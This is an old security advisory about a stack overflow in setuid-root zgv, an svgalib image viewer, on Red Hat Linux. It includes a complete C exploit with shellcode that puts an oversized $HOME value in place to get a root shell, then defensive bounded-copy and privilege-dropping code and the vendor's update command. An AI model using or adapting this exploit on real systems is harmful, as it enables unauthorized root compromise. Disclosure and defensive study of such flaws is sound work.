COMMAND

    svgalib/zgv

SYSTEMS AFFECTED

    Redhat Linux 3.0.3 - 4.1 / Any Linux with zgv setuid root

PROBLEM

    svgalib 1.2.10 and below do not properly revoke privileges: because
    the saved user id stays root, any svgalib application may still be
    vulnerable to buffer overruns (stack overwrites).

    svgalib/zgv-2.7 is an svgalib GIF/JPG viewer.  zgv takes data from
    an environment variable (HOME) and copies the entire length of the
    environment variable into an automatic (stack) character buffer.
    The result is that arbitrary code may be executed as root.  There
    are also overflows on the command line and through stdin.

    With zgv,  the consequences  are minimal,  as only  a user who has
    access  to  the  console  can  exploit  this  hole.  However, most
    svgalib  applications   are  poorly   written  from   a   security
    standpoint and the potential compromise may be greater with  other
    applications.  This problem affects all releases of Red Hat  Linux
    on Intel platforms.

    Credit goes to KRS[T] and their advisory.

    Bryan P. Self wrote the exploit below.  You may have to play with
    the offset a little.

    /*
     *
     * zgv exploit coded by BeastMaster V on June 20, 1997
     *
     * USAGE:
     *   For some strange reason, the filename length of this
     *   particular exploit must be one character long, otherwise you
     *   will be dropped into a normal unprivileged shell. Go figure....
     *   Try increasing the offset by increments of 10 if you get
     *   an Illegal Instruction or Segmentation Fault.
     *
     *   $ cp zgv_exploit.c n.c
     *   $ cc -o n n.c
     *   $ ./n
     *   Oak driver: Unknown chipset (id =  0)
     *   bash#
     *
     * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
     * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
     * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
     * DISCLAIMER: Please use this in a responsible manner.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset, memcpy, strlen */
    #include <unistd.h>

    /* i386 payload: setuid(getuid()) followed by execve("/bin/sh").
     * The trailing "0" is a marker the code scans for and replaces with
     * a NUL terminator at run time, so it is intentional. */
    char *shellcode =
      "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
      "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
      "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
      "\xcd\x80/"
      "/bin/sh"
      "0";

    /* Current stack pointer (i386 only), returned explicitly so the
     * function is well defined regardless of compiler optimisation. */
    char *get_sp(void) {
       char *sp;
       asm("movl %%esp,%0" : "=r"(sp));
       return sp;
    }

    #define bufsize 4096
    char buffer[bufsize];

    int main(void) {
      int i;

      /* Fill the buffer with the guessed return address (offset from
       * the current stack pointer; adjust if it does not land). */
      for (i = 0; i < bufsize - 4; i += 4)
        *(char **)&buffer[i] = get_sp() - 4675;

      /* NOP sled, then the payload. */
      memset(buffer, 0x90, 512);
      memcpy(&buffer[512], shellcode, strlen(shellcode));

      buffer[bufsize - 1] = 0;

      /* zgv copies $HOME unchecked into its stack buffer. */
      setenv("HOME", buffer, 1);

      execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
      perror("execl");   /* only reached if zgv could not be started */
      return 1;
    }
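    As an added illustration (not code from the advisory, from zgv or from
    svgalib), the two defensive fixes the advisory implies: a bounded copy
    of $HOME into a fixed stack buffer that fails closed on oversized input,
    and a privilege drop that also clears the saved uid, so the "saved user
    ids" problem cannot be used to regain root.  HOME_BUF and the function
    names are assumptions; value_of_length_fits builds constructed input.

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define HOME_BUF 256   /* assumed size of the fixed path buffer $HOME lands in */

/* Hardened copy: accept the value only if it fits, terminator included.
 * This replaces the unsafe strcpy(dst, getenv("HOME")) shape, which copies
 * however many bytes the caller placed in the environment. */
int copy_env_bounded(const char *value, char *dst, size_t dstsize)
{
    if (value == NULL || dstsize == 0) return -1;
    size_t n = strnlen(value, dstsize);
    if (n == dstsize) return -1;    /* no NUL inside dstsize: value too long */
    memcpy(dst, value, n + 1);      /* copies the NUL too */
    return 0;
}

/* 1 if a $HOME-like value is accepted into a HOME_BUF buffer, 0 if rejected. */
int home_accepted(const char *value)
{
    static char home[HOME_BUF];
    return copy_env_bounded(value, home, sizeof home) == 0;
}

/* Constructed input: a value of exactly len 'A's; reports whether it fits. */
int value_of_length_fits(size_t len)
{
    char *v = malloc(len + 1);
    if (v == NULL) return -1;
    memset(v, 'A', len);
    v[len] = '\0';
    int ok = home_accepted(v);
    free(v);
    return ok;
}

/* Permanent drop: seteuid() alone leaves the saved uid at root (the advisory's
 * saved-user-id problem); setresuid() rewrites real, effective and saved ids
 * together. Returns 0 only if all three ids now match the caller's. */
int drop_privileges(void)
{
    uid_t uid = getuid(), r, e, s;
    gid_t gid = getgid();
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0)
        return -1;
    if (getresuid(&r, &e, &s) != 0 || r != uid || e != uid || s != uid)
        return -1;
    return 0;
}
```

    Run as a non-root user drop_privileges() is a no-op that still verifies
    the ids; as a setuid-root process it is what makes the drop permanent.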

SOLUTION

    svgalib-1.2.11 will address this security issue.  A newer  version
    of svgalib is now available which fixes this problem for users  of
    Red Hat Linux/Intel 4.0, 4.1, and 4.2.

    Red Hat Software strongly recommends that all users with svgalib, or
    any software which requires svgalib, update to this version of
    svgalib immediately:

        Intel 4.0, 4.1, 4.2
        -------------------
        rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/svgalib-1.2.10-3.i386.rpm